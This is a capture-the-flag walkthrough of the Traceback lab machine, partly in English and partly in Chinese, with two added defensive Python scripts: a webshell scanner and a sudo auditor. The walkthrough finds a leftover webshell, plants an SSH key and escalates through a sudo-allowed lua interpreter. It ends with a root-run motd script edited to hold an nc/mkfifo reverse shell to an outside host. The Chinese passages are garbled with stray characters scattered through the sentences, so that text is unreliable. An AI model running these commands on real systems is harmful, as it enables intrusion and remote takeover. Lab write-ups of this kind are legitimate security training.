Overview
The target is a Linux box hosting a website. The site has already been hacked, and the attacker left clues and tools behind on the server; we use those to get root and the flag. First, some OSINT on the attacker turns up their GitHub account, which gives us leads on webshells; wfuzz then finds the webshell the attacker uploaded to the target site. The webshell gets us the webadmin account. Clues on the host point to a way of running a lua script with elevated privileges, which yields a second, higher-privileged account, sysadmin. Finally, pspy shows a privileged scheduled task running local scripts; editing one of those scripts to spawn a reverse shell gives us root.
Information gathering
root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp filtered silverplatter
1011/tcp filtered unknown
1130/tcp filtered casp
1521/tcp filtered oracle
2119/tcp filtered gsigatekeeper
3476/tcp filtered nppmp
4900/tcp filtered hfcs
5440/tcp filtered unknown
5903/tcp filtered vnc-3
6580/tcp filtered parsec-master
7741/tcp filtered scriptview
8292/tcp filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds
用瀏覽器訪問目標(biāo)網(wǎng)站冈闭,發(fā)現(xiàn)頁面已經(jīng)被人日了俱尼,從頁面留下的信息看Xh4H
可能是黑客的名字(目標(biāo)網(wǎng)站是80段,我本地做了映射)
google這個(gè)名字找到了對方的github賬號(hào)拒秘,里面有一個(gè)工程Web-Shells号显。根據(jù)目標(biāo)網(wǎng)站的提示,說黑客留了一些后門在這里躺酒,索性把這個(gè)工程下的webshell名字作為字典嘗試爆破目錄
root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
Brute forcing
Brute-forcing the directory with wfuzz does indeed turn up the webshell the attacker used, smevk.php.
root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.181/FUZZ
Total requests: 17
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000017: C=200 44 L 151 W 1113 Ch ""
000015: C=200 58 L 100 W 1261 Ch "smevk.php"
Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192
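The flip side of the step above is what a defender should run on their own web root: rather than guessing shell names from outside, walk the document root and flag files that either carry a known webshell filename or combine a request-input read with an execution or decoding primitive. The scanner below is an added example, not code from the write-up; the name list reuses the filenames from fuzz.txt above, while the content indicators and the sample files it builds under a temporary directory are constructed for the demonstration.

```python
"""Scan a web root for files whose names match a known-webshell list and
whose contents contain typical webshell primitives.

Added example for defenders (not from the original write-up). The name list
reuses the filenames from the fuzz.txt dictionary above; the content
indicators and the sample files built under a temporary directory are
constructed for this demonstration.
"""
import os
import re
import tempfile
from pathlib import Path

# Filenames from the write-up's fuzz.txt (names of public webshells).
KNOWN_WEBSHELL_NAMES = {
    "alfa3.php", "alfav3.0.1.php", "andela.php", "bloodsecv4.php", "by.php",
    "c99ud.php", "cmd.php", "configkillerionkros.php", "jspshell.jsp",
    "mini.php", "obfuscated-punknopass.php", "punk-nopass.php",
    "punkholic.php", "r57.php", "smevk.php", "wso2.8.5.php",
}

# PHP primitives that almost every webshell relies on; a legitimate page rarely
# feeds request data straight into them.
SUSPICIOUS_PATTERNS = [
    re.compile(r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("),
    re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
]


def scan_file(path: Path) -> dict:
    """Return the findings for one file: name match and content indicators."""
    findings = {
        "path": str(path),
        "known_name": path.name.lower() in KNOWN_WEBSHELL_NAMES,
        "indicators": [],
    }
    try:
        text = path.read_text(errors="ignore")
    except OSError:
        return findings
    for pattern in SUSPICIOUS_PATTERNS:
        for m in pattern.finditer(text):
            findings["indicators"].append(m.group(0))
    return findings


def scan_webroot(root: str, extensions=(".php", ".phtml", ".jsp")) -> list:
    """Walk the web root and return findings for every file worth looking at.

    A file is reported when its name is on the known list, or when it contains
    both a request-input read and an execution/decoding primitive (the
    combination, not either one alone, is what makes a file look like a shell).
    """
    hits = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            if path.suffix.lower() not in extensions:
                continue
            f = scan_file(path)
            has_input = any(i.startswith("$_") for i in f["indicators"])
            has_exec = any(not i.startswith("$_") for i in f["indicators"])
            if f["known_name"] or (has_input and has_exec):
                hits.append(f)
    return hits


def demo() -> list:
    """Build a constructed web root, scan it, and return the reported paths."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "index.php").write_text("<?php echo 'Help us'; ?>\n")
        # constructed minimal webshell under a name from the list
        Path(root, "smevk.php").write_text("<?php eval($_POST['cmd']); ?>\n")
        # constructed shell under an innocuous name: a name check alone would miss it
        Path(root, "uploads").mkdir()
        Path(root, "uploads", "img.php").write_text(
            "<?php system(base64_decode($_GET['q'])); ?>\n")
        hits = scan_webroot(root)
        return sorted(os.path.relpath(h["path"], root) for h in hits)


if __name__ == "__main__":
    for p in demo():
        print("suspicious:", p)
```

Run it against a real document root with scan_webroot("/var/www/html"); the name check catches lazy drops like smevk.php, and the content check catches the same shell renamed to something harmless.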
Opening it in a browser shows a fully featured webshell; checking the current user shows it runs as webadmin. To get a stable connection, we drop a public key into /home/webadmin/.ssh and log in from our own machine with the matching private key.
First, generate a key pair locally:
root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
| .+=+BEB|
| +.*ooOo*|
| . O.*+.B |
| = B.o. o|
| S * . oo |
| + .. .|
| . o |
| o. |
| o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root 398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root 666 May 28 03:03 known_hosts
把公鑰的文件的內(nèi)容copy出來雳刺,保存成文件authorized_keys
劫灶,然后利用webshall直接上傳至/home/webadmin/.ssh
,接下來就可以直接用私鑰+ssh登錄了掖桦。
在家目錄下找到一些線索本昏,note.txt
提到了lua
,然后我們在.bash_history
找到了一些操作記錄枪汪,看起來是要使用/home/sysadmin/luvit
執(zhí)行privesc.lua
腳本涌穆,但是經(jīng)過一通查找,卻并沒有找到這兩個(gè)文件的位置雀久,并且webadmin賬號(hào)沒有權(quán)限讀取sysadmin下面的文件
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
Privilege escalation
sudo -l shows that the binary we are after, luvit, can be run as sysadmin without a password. As it happens, some other player had already left a lua file in the home directory that spawns bash; its entire content is one line, os.execute("/bin/bash").
Following the hint from .bash_history, running sudo -u sysadmin /home/sysadmin/luvit script.lua drops us straight into a bash shell as sysadmin, and moving into sysadmin's home directory gives us user.txt.
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw------- 1 sysadmin sysadmin 33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$
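The rule that made this step possible is easy to spot in a sudoers audit: a NOPASSWD entry whose command is an interpreter, living under a home directory rather than a package-managed path. The script below parses sudo -l output and explains why each rule is risky. It is an added example, not code from the write-up; the sample text is the sudo -l output shown above plus one constructed extra rule, and the interpreter list is a heuristic of my own.

```python
"""Parse `sudo -l` output and flag rules that let a user run an interpreter
(or a binary under someone's home directory) as another account.

Added example for defenders, not from the original write-up. SAMPLE is the
sudo -l output from the write-up plus one constructed extra rule.
"""
import re
from pathlib import PurePosixPath

# Interpreters and script runners: a sudo rule for any of these is equivalent
# to a sudo rule for an arbitrary command, because the script chooses what runs.
INTERPRETERS = {
    "sh", "bash", "dash", "zsh", "python", "python2", "python3", "perl",
    "ruby", "node", "lua", "luajit", "luvit", "php", "awk", "gawk",
}

# "(runas) TAG: TAG: /path/to/command args"
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_l(text: str) -> list:
    """Return the command rules listed after 'may run the following commands'."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()  # "(user : group)" form
        tags = {t.strip(": ") for t in m.group("tags").split() if t.strip()}
        cmd = m.group("cmd").split()[0]  # the executable, ignoring arguments
        rules.append({"runas": runas, "nopasswd": "NOPASSWD" in tags, "command": cmd})
    return rules


def assess(rule: dict) -> list:
    """Return the reasons a rule is risky (an empty list means nothing flagged)."""
    reasons = []
    name = PurePosixPath(rule["command"]).name
    base = re.sub(r"[\d.]+$", "", name)  # python3.8 -> python
    if name in INTERPRETERS or base in INTERPRETERS:
        reasons.append("command is an interpreter: whoever controls the script controls the command")
    if rule["command"].startswith("/home/"):
        reasons.append("binary lives under a home directory, outside package-managed paths")
    if rule["nopasswd"]:
        reasons.append("no password required, so a low-privilege shell is enough to use it")
    if rule["runas"] in ("root", "ALL"):
        reasons.append("target account is root")
    return reasons


def audit(text: str) -> dict:
    """Map each allowed command to its list of risk reasons."""
    return {r["command"]: assess(r) for r in parse_sudo_l(text)}


SAMPLE = """\
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) /usr/bin/systemctl status apache2
"""

if __name__ == "__main__":
    for cmd, reasons in audit(SAMPLE).items():
        print(cmd)
        for r in reasons:
            print("  -", r)
```

Feed it `sudo -l` output from every account on a host (or the parsed sudoers file) and you get the luvit rule flagged on three counts at once: interpreter, home-directory binary, and no password.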
接下來要嘗試獲取root權(quán)限罩锐,這里用到pspy監(jiān)視進(jìn)程,這個(gè)工具可以在普通用戶權(quán)限下觀察到其他用戶執(zhí)行的命令
觀察一會(huì)發(fā)現(xiàn)卤唉,目標(biāo)機(jī)器每30秒會(huì)執(zhí)行一個(gè)cp命令唯欣,把一些文件從backup目錄復(fù)制到/etc/update-motd.d/
/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
移動(dòng)到這個(gè)目錄下,發(fā)現(xiàn)000-header里面的內(nèi)容正好就是ssh登錄的時(shí)候顯示的信息搬味,并且從pspy監(jiān)控的信息看來,當(dāng)用ssh登錄的時(shí)候這里會(huì)自動(dòng)執(zhí)行
sh -c uname -a; w; id; /bin/sh -i
正好與這個(gè)腳本吻合蟀拷,可以在后面加一行id
來驗(yàn)證
sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
id
最后碰纬,我們可以確定ssh登錄時(shí)候會(huì)觸發(fā)用root執(zhí)行這個(gè)腳本,所以我們在這里加一個(gè)nc的反彈shell问芬,在00-header里面添加rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f
同時(shí)在本機(jī)開啟監(jiān)聽nc -lvp 8888
悦析,獲取到root的反彈shell